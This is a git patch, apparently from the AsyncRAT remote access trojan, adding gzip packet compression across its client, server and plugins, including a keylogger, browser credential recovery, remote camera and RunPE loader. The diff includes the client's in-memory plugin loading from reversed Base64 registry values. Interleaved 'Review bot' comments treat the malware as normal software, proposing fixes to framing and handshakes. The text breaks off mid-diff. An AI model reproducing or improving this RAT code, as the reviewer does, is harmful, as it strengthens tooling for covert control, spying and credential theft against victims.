From d1b57f42918dd0e7df51bd3c343c6bb48b77384d Mon Sep 17 00:00:00 2001 
From: NYAN CAT Date: Sat, 5 Oct 2019 12:25:13 +0300 Subject: [PATCH] Update fixed bugs added Gzip compress/decompress for packets --- AsyncRAT-C#/Client/Algorithm/Zip.cs | 45 +++++++++++ AsyncRAT-C#/Client/Client.csproj | 1 + AsyncRAT-C#/Client/Connection/ClientSocket.cs | 14 ++-- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 15 +++- AsyncRAT-C#/Client/MessagePack/MsgPack.cs | 4 +- AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj | 1 + AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs | 14 ++-- .../Plugin/Chat/Chat/MessagePack/MsgPack.cs | 3 +- AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs | 45 +++++++++++ AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs | 14 ++-- AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj | 1 + .../Plugin/Extra/Extra/MessagePack/MsgPack.cs | 3 +- AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs | 45 +++++++++++ .../FileManager/FileManager/Connection.cs | 16 ++-- .../FileManager/FileManager.csproj | 1 + .../FileManager/MessagePack/MsgPack.cs | 3 +- .../FileManager/FileManager/TempSocket.cs | 14 ++-- .../Plugin/FileManager/FileManager/Zip.cs | 45 +++++++++++ .../LimeLogger/LimeLogger/Connection.cs | 14 ++-- .../LimeLogger/LimeLogger/LimeLogger.csproj | 1 + .../LimeLogger/MessagePack/MsgPack.cs | 3 +- .../Plugin/LimeLogger/LimeLogger/Zip.cs | 45 +++++++++++ .../Miscellaneous/Miscellaneous/Connection.cs | 14 ++-- .../Miscellaneous/Miscellaneous/ILMerge.props | 2 +- .../Miscellaneous/MessagePack/MsgPack.cs | 3 +- .../Miscellaneous/Miscellaneous.csproj | 1 + .../Plugin/Miscellaneous/Miscellaneous/Zip.cs | 45 +++++++++++ .../Plugin/Options/Options/Connection.cs | 14 ++-- .../Options/Options/MessagePack/MsgPack.cs | 3 +- .../Plugin/Options/Options/Options.csproj | 1 + AsyncRAT-C#/Plugin/Options/Options/Zip.cs | 45 +++++++++++ .../ProcessManager/Connection.cs | 14 ++-- .../ProcessManager/MessagePack/MsgPack.cs | 3 +- .../ProcessManager/ProcessManager.csproj | 1 + .../ProcessManager/ProcessManager/Zip.cs | 45 +++++++++++ .../Recovery/Browsers/Chromium/Chromium.cs | 20 ++--- 
.../Recovery/Browsers/Firefox/Firefox.cs | 51 ++++++------ .../Recovery/Recovery/MessagePack/MsgPack.cs | 3 +- .../Plugin/Recovery/Recovery/Packet.cs | 10 +-- .../Plugin/Recovery/Recovery/Recovery.csproj | 3 + AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs | 45 +++++++++++ .../RemoteCamera/RemoteCamera/Connection.cs | 14 ++-- .../RemoteCamera/MessagePack/MsgPack.cs | 3 +- .../RemoteCamera/RemoteCamera.csproj | 1 + .../Plugin/RemoteCamera/RemoteCamera/Zip.cs | 45 +++++++++++ .../RemoteDesktop/RemoteDesktop/Connection.cs | 14 ++-- .../RemoteDesktop/MessagePack/MsgPack.cs | 3 +- .../RemoteDesktop/RemoteDesktop/Packet.cs | 1 + .../RemoteDesktop/RemoteDesktop.csproj | 1 + .../Plugin/RemoteDesktop/RemoteDesktop/Zip.cs | 45 +++++++++++ .../Plugin/SendFile/SendFile/Connection.cs | 15 ++-- .../SendFile/SendFile/Handler/HandleSendTo.cs | 6 +- .../SendFile/Handler/HandleUninstall.cs | 6 +- .../SendFile/SendFile/MessagePack/MsgPack.cs | 3 +- .../Plugin/SendFile/SendFile/Methods.cs | 40 +++++++++- AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs | 2 +- .../Plugin/SendFile/SendFile/SendFile.csproj | 1 + AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs | 45 +++++++++++ AsyncRAT-C#/Server/Algorithm/Zip.cs | 46 +++++++++++ AsyncRAT-C#/Server/Connection/Clients.cs | 8 +- AsyncRAT-C#/Server/Connection/Listener.cs | 2 +- AsyncRAT-C#/Server/Forms/Form1.cs | 78 +++++++++++-------- .../Server/Forms/FormAbout.Designer.cs | 4 +- AsyncRAT-C#/Server/Forms/FormAbout.resx | 10 +++ AsyncRAT-C#/Server/Forms/FormBuilder.cs | 5 +- .../Server/Forms/FormSendFileToMemory.cs | 51 ++++++------ .../Server/Handle Packet/HandleListView.cs | 2 +- .../Server/Handle Packet/HandleRecovery.cs | 12 ++- AsyncRAT-C#/Server/Handle Packet/Packet.cs | 9 +-- AsyncRAT-C#/Server/Helper/Methods.cs | 7 +- AsyncRAT-C#/Server/ILMerge.props | 2 +- AsyncRAT-C#/Server/MessagePack/MsgPack.cs | 4 +- AsyncRAT-C#/Server/Server.csproj | 3 +- AsyncRAT-C#/Server/Settings.cs | 2 +- 74 files changed, 908 insertions(+), 252 deletions(-) create 
mode 100644 AsyncRAT-C#/Client/Algorithm/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Options/Options/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs create mode 100644 AsyncRAT-C#/Server/Algorithm/Zip.cs
diff --git a/AsyncRAT-C#/Client/Algorithm/Zip.cs b/AsyncRAT-C#/Client/Algorithm/Zip.cs
new file mode 100644
index 0000000..0dad786
--- /dev/null
+++ b/AsyncRAT-C#/Client/Algorithm/Zip.cs
@@ -0,0 +1,45 @@
+using System;
+using System.IO;
+using System.IO.Compression;
+
+namespace Client.Algorithm
+{
+ public static class Zip
+ {
+ public static byte[] Decompress(byte[] input)
+ {
+ using (var source = new MemoryStream(input))
+ {
+ byte[] lengthBytes = new byte[4];
+ source.Read(lengthBytes, 0, 4);
+
+ var length = BitConverter.ToInt32(lengthBytes, 0);
+ using (var decompressionStream = new GZipStream(source,
+ CompressionMode.Decompress))
+ {
+ var result = new byte[length];
+ decompressionStream.Read(result, 0, length);
+ return result;
+ }
+ }
+ }
+
+ public static byte[] Compress(byte[] input)
+ {
+ using (var result = new MemoryStream())
+ {
+ var lengthBytes = BitConverter.GetBytes(input.Length);
+ result.Write(lengthBytes, 0, 4);
+
+ using (var compressionStream = new GZipStream(result,
+ CompressionMode.Compress))
+ {
+ compressionStream.Write(input, 0, input.Length);
+ compressionStream.Flush();
+
+ }
+ return result.ToArray();
+ }
+ }
+ }
+}
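Review bot: `Decompress` sizes its output buffer from the 4-byte prefix without validating it and discards the return value of both `Read` calls. A negative or oversized prefix in a received frame makes `new byte[length]` throw or allocate far more than the payload justifies, and `GZipStream.Read` is not guaranteed to fill the buffer in one call, so the tail of `result` can be left zero-filled with no error. Any reader of this framing, including a decoder written for analysis, should bound the prefix before allocating and read in a loop until the stream ends, e.g. `if (length < 0 || length > MaxFrame) throw new InvalidDataException();` where `MaxFrame` is a placeholder for a protocol-specific limit. The prefix is written with `BitConverter`, so it is in host byte order, which deserves a comment on `Compress`. The `Plugin` copies of this file added later in the patch (index 60db829) have the same body.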
diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index 0116154..35858a5 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -74,6 +74,7 @@ + diff --git a/AsyncRAT-C#/Client/Connection/ClientSocket.cs b/AsyncRAT-C#/Client/Connection/ClientSocket.cs index 46d31c4..03a8a1e 100644 --- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs @@ -163,16 +163,12 @@ namespace Client.Connection return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 9dfa87d..91cf431 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs 
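Review bot: With `if (MS.Length == Buffersize)` removed in ClientSocket.cs, whatever has accumulated in `MS` is handed to `Packet.Read` as soon as the enclosing loop ends, so this path no longer checks that a complete frame arrived before dispatch. Dropping `Buffer = new byte[Buffersize - MS.Length];` also means the read size is no longer capped at the bytes still owed for the current frame; whether a read can now run into the next frame depends on how `Buffer` is sized and on the loop condition, both of which are above the hunk. Retaining the `if (MS.Length == Buffersize)` guard around the dispatch would make a truncated frame fail here rather than later inside `Zip.Decompress`. The same edit is repeated in each plugin's Connection.cs and in FileManager's TempSocket.cs.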
@@ -33,7 +33,8 @@ namespace Client.Handle_Packet case "plugin": // run plugin in memory { - Assembly assembly = AppDomain.CurrentDomain.Load(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)))); + Received(); + Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString))))); Type type = assembly.GetType("Plugin.Plugin"); dynamic instance = Activator.CreateInstance(type); instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install); @@ -52,9 +53,9 @@ namespace Client.Handle_Packet List plugins = new List(); foreach (string plugin in unpack_msgpack.ForcePathObject("Hash").AsString.Split(',')) { - if (SetRegistry.GetValue(plugin.Trim()) == null) + if (SetRegistry.GetValue(plugin) == null) { - plugins.Add(plugin.Trim()); + plugins.Add(plugin); Debug.WriteLine("plguin not found"); } } @@ -84,6 +85,14 @@ namespace Client.Handle_Packet } } + private static void Received() + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "Received"; + ClientSocket.Send(msgpack.Encode2Bytes()); + Thread.Sleep(1000); + } + public static void Error(string ex) { MsgPack msgpack = new MsgPack(); diff --git a/AsyncRAT-C#/Client/MessagePack/MsgPack.cs b/AsyncRAT-C#/Client/MessagePack/MsgPack.cs index 7f4ebf3..b77c94e 100644 --- a/AsyncRAT-C#/Client/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Client/MessagePack/MsgPack.cs @@ -8,6 +8,7 @@ * 修复整数值为127时解码出来为0的情况,感谢(Putree 274638001)反馈 * 2015-07-14 15:28:45 */ +using Client.Algorithm; using System; using System.Collections; using System.Collections.Generic; 
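Review bot: The stored-plugin encoding changes on the `AppDomain.CurrentDomain.Load(...)` line with no comment recording it: the value returned by `SetRegistry.GetValue` is now decoded as string-reversed Base64 of a `Zip`-framed blob (4-byte length, then a gzip stream) instead of string-reversed Base64 of the raw assembly. Values stored by an earlier build will fail inside `Zip.Decompress`, and no handling for that is visible in the hunk. A comment such as `// stored value = StrReverse(Base64(4-byte length + gzip(plugin)))` would make the format explicit for maintainers and for anyone decoding these entries during analysis; the writer side is not in this hunk, so the comment should be confirmed against it. The enclosing `switch` starts and ends outside the hunk.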
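Review bot: `Received()` ends with a fixed `Thread.Sleep(1000)` and has no comment saying what the one-second pause waits for; as written it stalls the handling thread on every `plugin` packet before the assembly is loaded. If the delay exists so the acknowledgement is processed before the plugin starts sending, state that in a comment, e.g. `// let the peer handle "Received" before the plugin opens its own traffic`, or replace the sleep with an explicit handshake. A named constant for the delay would also be clearer than the literal `1000`.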
@@ -494,6 +495,7 @@ namespace Client.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -835,7 +837,7 @@ namespace Client.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj b/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj index 65a58f3..a5fed79 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj @@ -59,6 +59,7 @@ + diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs index 762fb3d..0ff8eaa 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs @@ -126,16 +126,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); 
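Review bot: `bytes = Zip.Decompress(bytes);` is applied unconditionally, so every buffer reaching this decoder must now carry the length-plus-gzip framing; input that is not framed that way fails or yields a wrongly sized array inside `Decompress` before `DecodeFromStream` runs, and no handling is visible in the hunk. This is a wire-format break between builds on either side of this commit, which the description should state, since the subject only says compression was added. Overwriting the `bytes` parameter also hides the original input from a debugger; a local such as `var payload = Zip.Decompress(bytes);` reads more clearly. The matching `return Zip.Compress(r);` in the next hunk and the same pair in each plugin's MsgPack.cs follow the same pattern. The method containing this hunk starts outside it.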
@@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs index 70a0271..be81e18 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs 
@@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj index a0ef481..ddcb928 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj @@ -53,6 +53,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs 
@@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs index c9e93f3..ef4dad4 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs @@ -128,17 +128,13 @@ namespace Plugin IsConnected = false; return; } - MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); + MS.Write(Buffer, 0, rc); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); 
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj b/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj index 9339595..e235a1a 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj @@ -54,6 +54,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs index 23ec801..d0e8a12 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); 
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs
new file mode 100644
index 0000000..60db829
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs
@@ -0,0 +1,45 @@
+using System;
+using System.IO;
+using System.IO.Compression;
+
+namespace Plugin
+{
+ public static class Zip
+ {
+ public static byte[] Decompress(byte[] input)
+ {
+ using (var source = new MemoryStream(input))
+ {
+ byte[] lengthBytes = new byte[4];
+ source.Read(lengthBytes, 0, 4);
+
+ var length = BitConverter.ToInt32(lengthBytes, 0);
+ using (var decompressionStream = new GZipStream(source,
+ CompressionMode.Decompress))
+ {
+ var result = new byte[length];
+ decompressionStream.Read(result, 0, length);
+ return result;
+ }
+ }
+ }
+
+ public static byte[] Compress(byte[] input)
+ {
+ using (var result = new MemoryStream())
+ {
+ var lengthBytes = BitConverter.GetBytes(input.Length);
+ result.Write(lengthBytes, 0, 4);
+
+ using (var compressionStream = new GZipStream(result,
+ CompressionMode.Compress))
+ {
+ compressionStream.Write(input, 0, input.Length);
+ compressionStream.Flush();
+
+ }
+ return result.ToArray();
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs
index d80ed26..bcbcafd 100644
--- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs
@@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj index fdb2807..38af0cf 100644 --- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj @@ -52,6 +52,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs index 131eb37..397c240 100644 --- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs 
@@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs index 70a0271..be81e18 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); 
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props index aaadb12..b0fc9d2 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props @@ -41,7 +41,7 @@ - + false diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj index fccdb96..e764f20 100644 --- 